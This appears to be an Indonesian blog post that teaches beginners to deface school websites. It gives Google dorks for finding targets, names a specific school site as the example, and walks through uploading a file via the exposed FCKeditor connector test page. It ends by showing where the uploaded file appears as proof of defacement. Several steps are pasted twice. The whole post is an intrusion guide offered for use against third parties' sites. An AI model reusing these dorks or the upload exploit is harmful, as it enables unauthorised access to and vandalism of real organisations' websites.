Mungkin Tutorial ini sudah ketinggalan atau sudah banyak yg mengetahui nya .
Tapi sengaja saya share buat para Nubi Hackel =))
Langsung aja dah ..
1. Siapkan file format .txt. ( bisa di buat di notepad ).
Tapi sengaja saya share buat para Nubi Hackel =))
Langsung aja dah ..
1. Siapkan file format .txt. ( bisa di buat di notepad ).
2. Buka Google lalu masukan Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
www.smkn1kuta.sch.id/
3. Exploit: /editor/filemanager/connectors/test.html
Kalo bingung masukin Exploit nya, ini contohnya
eX: www.smkn1kuta.sch.id/
di masukin Exploit jadi begini
www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html,
Nahh begitu ujung nya di tambahin :D
Tekan Enter dehh atau masuk kesana , dan akan terlihat seperti ini
Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
www.smkn1kuta.sch.id/
3. Exploit: /editor/filemanager/connectors/test.html
Kalo bingung masukin Exploit nya, ini contohnya
eX: www.smkn1kuta.sch.id/
di masukin Exploit jadi begini
www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html,
Nahh begitu ujung nya di tambahin :D
Tekan Enter dehh atau masuk kesana , dan akan terlihat seperti ini
Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload
Hasil nya akan seperti gambar yang di atas bila BERHASIL
Selain
itu ada kemungkinan gagal. Banyak kemungkinan, mungkin nama file sudah
ada sehingga akan menambah sesuatu seperti (1). Ok lanjut, terus cara
ngeliat hasil nya
http://www.[site].sch.id/userfiles/file/namafilesobat.txt
http://www.[site].sch.id/userfiles/namafilesobat.txt
jadi punya Admin masuk di
http://www.smkn1kuta.sch.id/userfiles/file/WaHz-Here(1).txt bisa di klik untuk melihat hasilnya :D
Selesai :D Kamu telah berhasil men-Deface nya walaupun bukan di Index nya (oops :)
Semoga Berhasil dan Semoga Bermanfaat ^_^
No comments:
Post a Comment